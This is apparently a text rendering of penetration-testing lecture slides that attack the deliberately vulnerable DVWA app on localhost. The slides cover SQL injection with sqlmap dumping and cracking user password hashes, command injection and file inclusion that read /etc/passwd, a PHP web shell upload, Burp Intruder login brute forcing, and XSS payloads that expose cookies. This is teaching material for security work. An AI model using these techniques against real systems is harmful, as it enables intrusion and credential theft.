  • 97. [Slide: Burp Suite Free Edition v1.4.01 intercept of the raw request GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1, Host: 127.0.0.1, User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-us,en;q=0.5, Accept-Encoding: gzip, deflate, Proxy-Connection: keep-alive, Referer: http://127.0.0.1/vulnerabilities/sqli/?id=2, Cookie: PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low. Below it, sqlmap output: [18:48:35] [INFO] the back-end DBMS is MySQL; [18:48:35] [INFO] fetching banner; web server operating system: Linux Ubuntu 10.04 (Lucid Lynx); web application technology: PHP 5.3.2, Apache 2.2.14; back-end DBMS operating system: Linux Ubuntu; back-end DBMS: MySQL 5.0; banner: '5.1.41-3ubuntu12'.]
  • 98. [Slide: sqlmap output. [18:48:35] [INFO] fetching current database; current database: 'dvwa'. [19:02:20] [INFO] fetching columns for table 'users' on database 'dvwa'. Database: dvwa, Table: users [6 columns]: avatar varchar(70), first_name varchar(15), last_name varchar(15), password varchar(32), user varchar(15), user_id int(6).]
  • 99. [Slide: sqlmap output. [19:05:58] [INFO] postprocessing table dump. Database: dvwa, Table: users [5 entries], columns user_id | user | password: 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password); 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123); 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley); 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein); 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password). The cleartext in parentheses is sqlmap's dictionary match for each MD5 hash.]
  • 101. [Slide: DVWA "Vulnerability: Command Execution" page, "Ping for FREE. Enter an IP address below:". Output of pinging 127.0.0.1: PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data; three 64-byte replies (icmp_seq=1..3, ttl=64, times around 0.05 ms); 3 packets transmitted, 3 received, 0% packet loss.]
  • 102. [Slide: the same page after the injected command. The normal ping output (3 packets transmitted, 3 received, 0% packet loss, time 1999ms) is followed by the contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash, daemon:x:1:1:daemon:/usr/sbin:/bin/sh, bin:x:2:2:bin:/bin:/bin/sh, sys:x:3:3:sys:/dev:/bin/sh, sync:x:4:65534:sync:/bin:/bin/sync, games:x:5:60:games:/usr/games:/bin/sh, man:x:6:12:man:/var/cache/man:/bin/sh, lp:x:7:7:lp:/var/spool/lpd:/bin/sh, mail:x:8:8:mail:/var/mail:/bin/sh, news:x:9:9:news:/var/spool/news:/bin/sh, uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh, proxy:x:13:13:proxy:/bin:/bin/sh, www-data:x:33:33:www-data:/var/www:/bin/sh, backup:x:34:34:backup:/var/backups:/bin/sh.]
  • 104. [Slide: DVWA "Vulnerability: File Upload" page ("Choose an image to upload") with the GTK file chooser open on /root. Files listed: 500worst-passwords.txt (3.4 KB), DVWA_install.sh (2.7 KB), dvwa_users.txt (12 bytes), localhost-check.nbe (407.4 KB), Shell_v0_7.php (17.1 KB, 03/17/2007). Terminal below: root@bt:/# find / -name Shell_v0_7.php → /root/Shell_v0_7.php, /var/www/hackable/uploads/Shell_v0_7.php, /tmp/VMwareDnD/da6c24a6/Shell_v0_7.php.]
  • 105. [Slide: Firefox, "Command Shell - 127.0.0.1", URL http://127.0.0.1/hackable/uploads/Shell_v0_7.php. Menu: [Execute command] [Upload file] [Change directory] [File browser] [Create File]. Quick Commands: Clear screen, Clear history, Can I function?, Get server info, Read /etc/passwd, Open ports, Running processes, Readme. Footer: About Ajax/PHP Command Shell by Ironfist, Version 0.7.]
  • 106. [Slide: the same web shell. www-data# netstat -an | grep -i listen shows LISTEN sockets on 127.0.0.1:7337, 127.0.0.1:3306, 0.0.0.0:80 and ::1:7337. Then: www-data# ls → Shell_v0_7.php dvwa_email.png; www-data# mkdir goats; www-data# ls → Shell_v0_7.php dvwa_email.png [goats]; www-data# cd goats → "Current directory changed to goats"; www-data# touch bah.txt; www-data# ls → bah.txt.]
  • 111. [Slide: DVWA "Vulnerability: Brute Force" login form beside Burp Suite Proxy > Intercept ("intercept is on"). GET request to http://127.0.0.1:80/vulnerabilities/brute/, params: username=corndogs (URL), password=sureareyummy (URL), Login=Login (URL), PHPSESSID=m7c0uorvt8m8sgddjbv5oj4ue2 (cookie), security=low (cookie).]
  • 112. [Slide: Burp Proxy > History (filter: hiding CSS, image and general binary content). Entries: POST to safebrowsing.clients.google.com /safebrowsing/downloads?client=navclient-auto-ffox&appver=10..., GET http://127.0.0.1/vulnerabilities/brute/?username=corndogs&password=sureareyummy..., GET http://127.0.0.1/dvwa/js/dvwaPage.js, and several GET /safebrowsing/rd/... requests. The selected request is the brute-force GET with the same username, password, Login and cookie parameters as slide 111.]
  • 113. [Slide: right-click context menu on the proxy history entry (remove item from scope, spider from here, actively scan this item, send to intruder, send to repeater, send to sequencer, send to comparer (request/response), show response in browser, request in browser, engagement tools [pro version only], show new history window, add comment, highlight, delete this item, clear history, copy URL, copy links in item, save item). Intruder > Positions tab: attack type sniper, 5 payload positions marked with § in GET /vulnerabilities/brute/?username=§corndogs§&password=§sureareyummy§&Login=§Login§ HTTP/1.1 and in Cookie: PHPSESSID=§...§; security=§low§, with the Host: 127.0.0.1, User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2, Accept, Accept-Language: en-us,en;q=0.5, Accept-Encoding: gzip, deflate, Proxy-Connection: keep-alive and Referer: http://127.0.0.1/vulnerabilities/brute/ headers.]
  • 115. [Slide: gedit showing dvwa_users.txt with one username per line: admin, gordonb, 1337, pablo, smithy. Burp Intruder > Payloads tab: Payload Sets ("You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various payload types are available for each payload set, and each payload type can be customized in different ways."), payload set 1, payload type: Runtime file, payload count: 2 (approx), request count: 0. Payload Options (Runtime file): "This payload type lets you configure a file from which to read payload strings at runtime", select file: /dvwa_users.txt.]
  • 116. [Slide: Burp Intruder attack results. Successful username/password pairs, each with status 200 and response length: admin / password (4944), pablo / letmein (4944), smithy / password (4946), gordonb / abc123 (4948).]
  • 119. [Slide: Burp Sequencer > Live capture, token location options: cookie, form field, manual selection. Selected cookie: BBC-UID. Base response: HTTP/1.1 200 OK, Date: Thu, 15 Nov 2007 14:38:50 GMT, Server: Apache, Set-Cookie: BBCNewsAudience=Domestic; path=/; domain=bbc.co.uk; expires=Sat, 17-Nov-2007 14:38:50 GMT, Set-Cookie: BBC-UID=...; expires=Sat, 15-Nov-2008 14:38:50 GMT; path=/; domain=bbc.co.uk, Accept-Ranges: bytes, Cache-Control: max-age=0. Token starts: after expression / at offset 194; token ends: at delimiter / at fixed length 55. Button: start capture.]
  • 120. [Slide: Burp Sequencer summary. Overall result: "The overall quality of randomness within the sample is estimated to be: excellent. At a significance level of 1%, the amount of effective entropy is estimated to be 116 bits." Chart: number of bits of effective entropy (0 to 170) at each significance level (10%, 1%, 0.1%, 0.01%, 0.001%), with the explanation that each significance level defines a minimum probability of the observed results occurring if the sample is randomly generated; when the probability falls below this level the hypothesis that the sample is random is rejected, so using a lower significance level means stronger evidence is required to reject the hypothesis, increasing the chance that non-random data will be treated as random. Reliability: "Based on the sample size, the reliability of the results is reasonable. Note that statistical tests provide only an indicative guide to the randomness of the sampled data. Results obtained may contain false positives and negatives and may not correspond to the practical predictability of the tokens sampled."]
  • 121. [Slide: Burp Sequencer > Bit-level analysis, FIPS monobit test tab (other tabs: summary, character-level analysis, options, FIPS poker test, FIPS runs test, FIPS long runs test, spectral tests, correlation, compression). Chart of significance per bit (0 to 200) against the FIPS pass level. FIPS result: 22 bits failed the test, among them bits 0, 1, 2 and 7, each reported as "too few ones" (bit 0: count 649, probability in a random sample less than 0.0001%); the remaining bits passed.]
  • 123. [Slide: diagram of the Linux filesystem tree on the DVWA host: / with bin, etc (containing passwd), var, usr, lib; /var/www/dvwa with css, images, includes and js subdirectories; "tons of apps" under /usr.]
  • 124. [Slide: terminal root@bt:/var/www/dvwa. root@bt:~# ls → Desktop DVWA_install.sh localhost-check.nbe ZAP.html; root@bt:~# cd ../; root@bt:/# ls → bin boot cdrom dev etc home initrd.img lib lost+found media mnt opt pentest proc root sbin selinux srv sys usr var vmlinuz; root@bt:/# cd var; root@bt:/var# ls → backups cache lib local lock log opt run spool www yp; root@bt:/var# cd www; root@bt:/var/www# ls → dvwa external; root@bt:/var/www# cd dvwa; root@bt:/var/www/dvwa# ls → about.php CHANGELOG.txt config COPYING.txt css docs external favicon.ico hackable ids_log.php images includes index.php instructions.php js login.php logout.php php.ini phpinfo.php README.txt robots.txt security.php setup.php vulnerabilities.]
  • 125. [Slide: Firefox, "Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: File Inclusion", with the included /etc/passwd rendered in the page: root, daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data, backup, list, irc, gnats ("Gnats Bug-Reporting System"), nobody, libuuid, landscape, messagebus, avahi, snort, ntp, mysql, postgres (uid 1000).]
  • 134. [Slide: reflected XSS attack flow between User, Hacker and Web application. 1. Log in (User to Web application). 2. Send malicious link (Hacker to User). 3. Send malicious request (User to Web application). 4. Respond with malicious script (Web application to User). 5. Malicious script executes (in the User's browser). 6. Cookie is sent (User to Hacker). 7. Masquerade as victim (Hacker to Web application).]
  • 135. [Slide: DVWA "Vulnerability: Reflected Cross Site Scripting (XSS)", "What's your name?" form, with the browser alert box "JRod was here!" and the page output "Hello". Burp Proxy > Options: intercept server responses, rules "intercept if: content type matches text", "request was modified", "request was intercepted", "response code does not match ^304$", "URL is in target scope", with the "update Content-Length" checkbox.]
  • 136. [Slide: Burp Proxy intercept of GET /vulnerabilities/xss_r/ with params name=%3Cscript%3Ealert%28%22JRod+was+here%21%22%29%3C%2Fscript%3E (URL) and cookies PHPSESSID=10tlrk8vql4s8kkqacneo55fq7, security=low. The intercepted response body contains: <div class="body_padded"><h1>Vulnerability: Reflected Cross Site Scripting (XSS)</h1><div class="vulnerable_code_area"><form name="XSS" action="#" method="GET"><p>What's your name?</p><input name="name"><input type="submit" value="Submit"></form><pre>Hello <script>alert("JRod was here!")</script></pre></div>, i.e. the name parameter is echoed into the page unencoded.]
  • 137. [Slide: Burp Decoder. Input: <script>alert("JRod was here!!!")</script>; "encode as URL" output: %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%4a%52%6f%64%20%77%61%73%20%68%65%72%65%21%22%29%3c%2f%73%63%72%69%70%74%3e.]
  • 138. [Slide: Burp Proxy intercept of GET /vulnerabilities/xss_r/ with the fully URL-encoded name parameter from the Decoder and cookies PHPSESSID=10tlrk8vql4s8kkqacneo55fq7, security=low; Firefox address bar shows http://127.0.0.1/vulnerabilities/xss_r/?name=<script>alert("JRod was here!")</script>.]
  • 139. [Slide: DVWA reflected XSS page with the alert box displaying the victim's cookies: PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low.]
  • 140. [Slide: stored XSS attack flow between User, Hacker and Web application. 1. Plant stored XSS attack (Hacker to Web application). 2. View vulnerable page while authenticated (User to Web application). 3. Respond with malicious script (Web application to User). 4. Malicious script executes. 5. Cookie is sent (User to Hacker). Finally: Masquerade as victim (Hacker to Web application).]
  • 141. [Slide: DVWA "Vulnerability: Stored Cross Site Scripting (XSS)" guestbook. Name field submitted: <script>alert("The Feds are watching me")</script>; the resulting alert "The Feds are watching me" then appears on every view of the page. Existing entries: Name: test, Message: This is a test comment.; Name: Dave, Message: I like hugs; Name: Keith.]
  • 143. The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>
  • 149. [Slide: Twitter error page, "Twitter is over capacity."]
  • 150. [Slide: Twitter error page, "PAGE NOT FOUND (p.s. see you soon)".]